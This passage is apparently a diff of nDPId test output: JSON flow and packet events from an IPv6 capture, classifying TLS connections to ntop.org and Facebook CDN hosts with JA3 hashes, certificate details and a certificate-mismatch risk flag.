{"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} -00610{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269145458,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1448269145458,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1012","src_port":59690,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00500{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":170,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1448269145458,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145458,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqABRQQAEIAwAAAAAAABAS6SoBu3aemNPcvXclgBAA6hVxAAABAQgKEg194OPdWG4="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":171,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1448269145478,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269145478,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACAGOSoAFFBAAQgDAAAAAAAAEBIqAA1AAAEAA3qswP\/+pw1MAbvpKty9dyV2npjUgBAA8BoIAAABAQgK494IbhIM+eU="} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":172,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuykAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} -00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269146905,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269146905,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":173,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1448269146905,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146905,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfMAAAAAoAJwgNR+AAACBAWgBAIIChINf0kAAAAAAQMDBw=="} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":174,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjun6mTbEj630oBJswJfaAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":175,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z44Bu8SPrfTp+pk3gBAA4dR2AAABAQgKEg1\/Sxvn+wE="} -00513{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":176,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269146912,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOyoCJvAArQGXAAAAAAAAAjYqAA1AAAEAA3qswP\/+pw1MAbvPjOjBmT8LSrsqoBJswEUcAAACBAV8BAIIChvn+wESDX9JAQMDBQ=="} -00501{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":177,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269146912,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqAibwAK0BlwAAAAAAAAI2z4wBuwtKuyrowZlAgBAA4dR2AAABAQgKEg1\/Sxvn+wE="} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":178,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -00907{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":179,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269146905,"flow_last_seen":1448269146912,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":224,"flow_tot_l4_payload_len":224,"flow_avg_l4_payload_len":56,"midstream":0,"thread_ts_msec":1448269146912,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":182,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":628,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} -00964{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":184,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3080,"flow_avg_l4_payload_len":513,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} -01392{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":186,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1448269146905,"flow_last_seen":1448269146921,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":3771,"flow_avg_l4_payload_len":471,"midstream":0,"thread_ts_msec":1448269146921,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"},"tls": {"version":"TLSv1.2","client_requested_server_name":"s-static.ak.facebook.com","server_names":"*.ak.fbcdn.net,s-static.ak.fbcdn.net,igsonar.com,*.igsonar.com,ak.facebook.com,*.ak.facebook.com,*.s-static.ak.facebook.com,connect.facebook.net,s-static.ak.facebook.com","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"b898351eb5e266aefd3723d466935494","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=DigiCert Inc, OU=www.digicert.com, CN=DigiCert High Assurance CA-3","subjectDN":"C=US, ST=CA, L=Menlo Park, O=Facebook, Inc., CN=*.ak.fbcdn.net","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"E7:62:76:74:8D:09:F7:E9:69:05:B8:1A:37:A1:30:2D:FF:3B:BC:0A"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"finished","flow_packets_processed":12,"flow_first_seen":1448269146905,"flow_last_seen":1448269146970,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2856,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":344,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53132,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00721{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"finished","flow_packets_processed":10,"flow_first_seen":1448269146905,"flow_last_seen":1448269146966,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":3547,"flow_tot_l4_payload_len":4139,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a02:26f0:ad:197::236","src_port":53134,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Facebook","breed":"Fun","category":"SocialNetwork"}} -00673{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"TLS","breed":"Safe","category":"Web"}} -00617{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":193,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":14,"flow_first_seen":1448269127395,"flow_last_seen":1448269127510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":506,"flow_tot_l4_payload_len":1009,"flow_avg_l4_payload_len":72,"midstream":1,"thread_ts_msec":1448269146970,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a00:1450:4001:803::1017","src_port":41776,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":84,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXIAAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} +00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1448269138575,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1448269138575,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00510{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":85,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1448269138575,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138575,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACgGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU0AAAAAoAJwgGsaAAACBAWgBAIIChINdycAAAAAAQMDBw=="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":86,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuSbiqmXmyY1W1zoBJvkBOIAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":87,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABkm4Bu5jVbXMqpl5tgBAA4WsSAAABAQgKEg13LQBerOc="} +00511{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":88,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":94,"pkt_l4_len":40,"thread_ts_msec":1448269138600,"pkt":"eKzApw1M9LUv\/K\/Cht1gAAAAACgGOCoDsMAAAwDQAAAAAABwEAEqAA1AAAEAA3qswP\/+pw1MAbuScEOqziew8Z1OoBJvkELPAAACBAWgBAIICgBerOcSDXcnAQMDCA=="} +00498{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":89,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":86,"pkt_l4_len":32,"thread_ts_msec":1448269138600,"pkt":"UMWNrEEBeKzApw1Mht1gAAAAACAGQCoADUAAAQADeqzA\/\/6nDUwqA7DAAAMA0AAAAAAAcBABknABu7DxnU5Dqs4ogBAA4WsSAAABAQgKEg13LQBerOc="} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":90,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00886{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1448269138575,"flow_last_seen":1448269138600,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":212,"flow_tot_l4_payload_len":212,"flow_avg_l4_payload_len":53,"midstream":0,"thread_ts_msec":1448269138600,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":94,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138627,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138627,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +00943{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":98,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1448269138575,"flow_last_seen":1448269138628,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":1640,"flow_avg_l4_payload_len":273,"midstream":0,"thread_ts_msec":1448269138628,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","alpn":"http\/1.1,spdy\/3.1,h2-14,h2"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":104,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1448269138575,"flow_last_seen":1448269138635,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1428,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":413,"midstream":0,"thread_ts_msec":1448269138635,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37486,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.ntop.org","server_names":"shop.ntop.org,www.shop.ntop.org","ja3":"d3e627f423a33ea41841c19b8af79293","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=GB, ST=Greater Manchester, L=Salford, O=COMODO CA Limited, CN=COMODO RSA Domain Validation Secure Server CA","subjectDN":"OU=Domain Control Validated, OU=PositiveSSL, CN=shop.ntop.org","alpn":"http\/1.1,spdy\/3.1,h2-14,h2","fingerprint":"FB:A6:FF:A7:58:F3:9D:54:24:45:E5:A0:C4:04:18:D5:58:91:E0:34"}} +01397{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":106,"source":"http_ipv6.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":10,"flow_first_seen":1448269138575,"flow_last_seen":1448269138636,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":2668,"flow_tot_l4_payload_len":4964,"flow_avg_l4_payload_len":496,"midstream":0,"thread_ts_msec":1448269138636,"l3_proto":"ip6","src_ip":"2a00:d40:1:3:7aac:c0ff:fea7:d4c","dst_ip":"2a03:b0c0:3:d0::70:1001","src_port":37488,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"10": {"risk":"TLS Certificate Mismatch","severity":"High","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"TLS.ntop","breed":"Safe","category":"Network"},"tls": 